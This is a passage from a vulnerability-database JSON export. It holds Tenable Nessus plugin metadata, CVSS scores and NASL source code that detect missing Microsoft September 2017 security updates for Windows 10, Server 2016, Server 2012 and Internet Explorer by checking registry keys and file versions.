"baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529"], "modified": "2020-06-04T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_CVE-2017-8529.NASL", "href": "https://www.tenable.com/plugins/nessus/136946", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136946);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2017-8529\");\n script_bugtraq_id(98953);\n script_xref(name:\"MSKB\", value:\"4038781\");\n script_xref(name:\"MSFT\", value:\"MS17-4038781\");\n script_xref(name:\"MSKB\", value:\"4038783\");\n script_xref(name:\"MSFT\", value:\"MS17-4038783\");\n script_xref(name:\"MSKB\", value:\"4038782\");\n script_xref(name:\"MSFT\", value:\"MS17-4038782\");\n script_xref(name:\"MSKB\", value:\"4038788\");\n script_xref(name:\"MSFT\", value:\"MS17-4038788\");\n\n script_name(english:\"Windows 10 / Windows Server 2016 September 2017 Information Disclosure Vulnerability (CVE-2017-8529)\");\n script_summary(english:\"Checks for presence of the patch rollup and registry key(s).\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by an information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update or a registry setting\nrequired to enable protections for CVE-2017-8529. It is, therefore, affected by an\ninformation disclosure vulnerability:\n\n- An information disclosure vulnerability exists when affected Microsoft\nscripting engines do not properly handle objects in memory. 
The vulnerability\ncould allow an attacker to detect specific files on the user's computer. In a\nweb-based attack scenario, an attacker could host a website that is used to\nattempt to exploit the vulnerability.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8529\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f6a3c24\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to the Microsoft CVE article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8529\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\n\nfunction is_print_fix_enabled(kb)\n{\n var keyx86 = \"SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_PRINT_INFO_DISCLOSURE_FIX\\iexplore.exe\";\n var keyx64 = \"SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_PRINT_INFO_DISCLOSURE_FIX\\iexplore.exe\";\n registry_init();\n var result = check_print_fix(key:keyx86);\n var ret_result = FALSE;\n var report = '';\n if(result != 'set')\n {\n report += '\\nThe following registry key is required to enable the fix for CVE-2017-8529 and is ' + result + '\\n ';\n report += 'HKLM\\\\' + keyx86;\n report += '\\n';\n ret_result = TRUE;\n }\n var arch = get_kb_item('SMB/ARCH');\n if(!isnull(arch) && arch == 'x64')\n {\n var x64result = check_print_fix(key:keyx64);\n if(x64result != 'set')\n {\n report += '\\nThe following registry key is required to enable the fix for CVE-2017-8529 and is ' + x64result + '\\n ';\n report += 'HKLM\\\\' + keyx64;\n report += '\\n';\n ret_result = TRUE;\n }\n\n }\n close_registry();\n if(ret_result)\n { \n hotfix_add_report(bulletin:'MS17-06', kb:kb, report);\n }\n\n return ret_result;\n}\n\nfunction check_print_fix(key)\n{\n var hklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n var key_h = get_registry_value(handle:hklm, item:key);\n RegCloseKey(handle:hklm);\n if(isnull(key_h))\n return 'missing.';\n else if(key_h == 0)\n return 'not enabled.';\n else\n return 'set';\n}\n\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\n## NB: 
Microsoft \nbulletin = 'MS17-09';\nkbs = make_list(\n '4038781',\n '4038783',\n '4038782',\n '4038788'\n);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (get_kb_item('Host/patch_management_checks')) \n exit(0, 'Patch coverage provided by monthly rollup plugin.');\n\n# Update only applies to Window 10 / Server 2016\nif (hotfix_check_sp_range(win10:'0') <= 0 || hotfix_check_server_core() == 1 || hotfix_check_server_nano() == 1) \n audit(AUDIT_OS_SP_NOT_VULN);\n\n\nos_build = get_kb_item('SMB/WindowsVersionBuild');\n\nswitch (os_build)\n{\n case 10240: # Windows 10 RTM\n kb = '4038781';\n break;\n case 10586: # Windows 10 1511\n kb = '4038783';\n break;\n case 14393: # Windows 10 1607 / Windows Server 2016\n kb = '4038782';\n break;\n case 15063: # Windows 10 1703\n kb = '4038788';\n break;\n default:\n audit(AUDIT_OS_SP_NOT_VULN);\n}\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# Run them all separately and avoid a bitwise or in the if statement\nrollupBool = (smb_check_rollup(os:'10', sp:0, os_build:os_build, rollup_date:'09_2017', bulletin:bulletin, rollup_kb_list:[kb]));\nprintfixBool = (is_print_fix_enabled());\n\nif (rollupBool || printfixBool)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:40:09", "description": "The Internet Explorer installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when affected Microsoft scripting engines do not properly handle objects in memory. 
The vulnerability could allow an attacker to detect specific files on the user's computer. (CVE-2017-8529)\n\n - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8750)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8747, CVE-2017-8749)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8741, CVE-2017-8748)\n\n - An information disclosure vulnerability exists in Microsoft browsers due to improper parent domain verification in certain functionality. An attacker who successfully exploited the vulnerability could obtain specific information that is used in the parent domain.\n (CVE-2017-8736)", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-11-30T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (September 2017)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8733", "CVE-2017-8736", "CVE-2017-8741", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8749", "CVE-2017-8750"], "modified": "2020-07-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "id": "SMB_NT_MS17_SEP_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/104896", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security 
Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104896);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/17\");\n\n script_cve_id(\n \"CVE-2017-8529\",\n \"CVE-2017-8733\",\n \"CVE-2017-8736\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\"\n );\n script_bugtraq_id(\n 98953,\n 100737,\n 100743,\n 100764,\n 100765,\n 100766,\n 100770,\n 100771\n );\n script_xref(name:\"MSKB\", value:\"4036586\");\n script_xref(name:\"MSKB\", value:\"4038792\");\n script_xref(name:\"MSKB\", value:\"4038799\");\n script_xref(name:\"MSKB\", value:\"4038777\");\n script_xref(name:\"MSFT\", value:\"MS17-4036586\");\n script_xref(name:\"MSFT\", value:\"MS17-4038792\");\n script_xref(name:\"MSFT\", value:\"MS17-4038799\");\n script_xref(name:\"MSFT\", value:\"MS17-4038777\");\n\n script_name(english:\"Security Updates for Internet Explorer (September 2017)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n affected Microsoft scripting engines do not properly\n handle objects in memory. The vulnerability could allow\n an attacker to detect specific files on the user's\n computer. (CVE-2017-8529)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
(CVE-2017-8750)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. In a web-based attack scenario, an attacker could\n host a specially crafted website that is designed to\n exploit the vulnerability through Microsoft browsers and\n then convince a user to view the website. An attacker\n could also embed an ActiveX control marked "safe\n for initialization" in an application or Microsoft\n Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised\n websites, and websites that accept or host user-provided\n content or advertisements. These websites could contain\n specially crafted content that could exploit the\n vulnerability. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8741, CVE-2017-8748)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. 
An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\");\n # https://support.microsoft.com/en-us/help/4036586/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?26b484bb\");\n # https://support.microsoft.com/en-us/help/4038792/windows-8-1-update-kb4038792\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?085e4d22\");\n # https://support.microsoft.com/en-us/help/4038799/windows-server-2012-update-kb4038799\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?35364720\");\n # https://support.microsoft.com/en-us/help/4038777/windows-7-update-kb4038777\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1dbb18cc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for the affected versions of Internet Explorer.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8741\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\"); \n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n script_copyright(english:\"This script is Copyright (C) 2017-2020 Tenable Network Security, Inc.\");\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nfunction is_print_fix_enabled(kb)\n{\n var keyx86 = \"SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_PRINT_INFO_DISCLOSURE_FIX\\iexplore.exe\";\n var keyx64 = \"SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_PRINT_INFO_DISCLOSURE_FIX\\iexplore.exe\";\n registry_init();\n var result = check_print_fix(key:keyx86);\n var ret_result = FALSE;\n var report = '';\n if(result != 'set')\n {\n report += '\\nThe following registry key is required to enable the fix for CVE-2017-8529 and is ' + result + '\\n ';\n report += 'HKLM\\\\' + keyx86;\n report += '\\n';\n ret_result = TRUE;\n }\n var arch = get_kb_item('SMB/ARCH');\n if(!isnull(arch) && arch == 'x64')\n {\n var x64result = check_print_fix(key:keyx64);\n if(x64result != 'set')\n {\n report += '\\nThe following registry key is required to enable the fix for CVE-2017-8529 and is ' + x64result + '\\n ';\n report += 'HKLM\\\\' + keyx64;\n report += '\\n';\n ret_result = TRUE;\n }\n\n }\n close_registry();\n if(ret_result)\n { \n hotfix_add_report(bulletin:'MS17-06', kb:kb, report);\n }\n\n return ret_result;\n}\n\nfunction check_print_fix(key)\n{\n var hklm = 
registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n var key_h = get_registry_value(handle:hklm, item:key);\n RegCloseKey(handle:hklm);\n if(isnull(key_h))\n return 'missing.';\n else if(key_h == 0)\n return 'not enabled.';\n else\n return 'set';\n}\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-09';\nkbs = make_list(\n '4036586',\n '4038792',\n '4038799',\n '4038777'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.18792\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4036586\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22248\", min_version:\"10.0.9200.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4036586\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.18792\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4036586\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n 
hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21046\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4036586\")\n)\n hotfix_vuln = TRUE;\n printfixBool = is_print_fix_enabled(kb:'4036586');\n\nif(hotfix_vuln || printfixBool)\n{\n if (hotfix_vuln)\n {\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4036586 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4038792 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-09', kb:'4038792', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4038799 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-09', kb:'4038799', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4038777 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-09', kb:'4038777', report);\n }\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:35:45", "description": "The remote Windows host is missing security update 4038786 or cumulative update 4038799. It is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code execution vulnerability exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements. (CVE-2017-0161)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-8683)\n\n - An information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681, CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows Server DHCP service when an attacker sends specially crafted packets to a DHCP failover server. An attacker who successfully exploited the vulnerability could either run arbitrary code on the DHCP failover server or cause the DHCP service to become nonresponsive. To exploit the vulnerability, an attacker could send a specially crafted packet to a DHCP server. 
However, the DHCP server must be set to failover mode for the attack to succeed. The security update addresses the vulnerability by correcting how DHCP failover servers handle network packets. (CVE-2017-8686)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when Windows Shell does not properly validate file copy destinations. 
An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the base address of the kernel driver from a compromised process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM Host Agent Service of Remote Desktop Virtual Host role when it fails to properly validate input from an authenticated user on a guest operating system. To exploit the vulnerability, an attacker could issue a specially crafted certificate on the guest operating system that could cause the VM host agent service on the host operating system to execute arbitrary code. The Remote Desktop Virtual Host role is not enabled by default. An attacker who successfully exploited the vulnerability could execute arbitrary code on the host operating system. The security update addresses the vulnerability by correcting how VM host agent service validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709, CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. 
An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. To exploit the vulnerability, the user must either browse to a malicious website or be redirected to it. In an email attack scenario, an attacker could send an email message in an attempt to convince the user to click a link to the malicious website. (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8741)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
(CVE-2017-8747)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8747, CVE-2017-8749)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8759) \n - An information disclosure vulnerability exists in Microsoft browsers in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose files on a user's computer. (CVE-2017-8529)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-12T00:00:00", "type": "nessus", "title": "Windows Server 2012 September 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
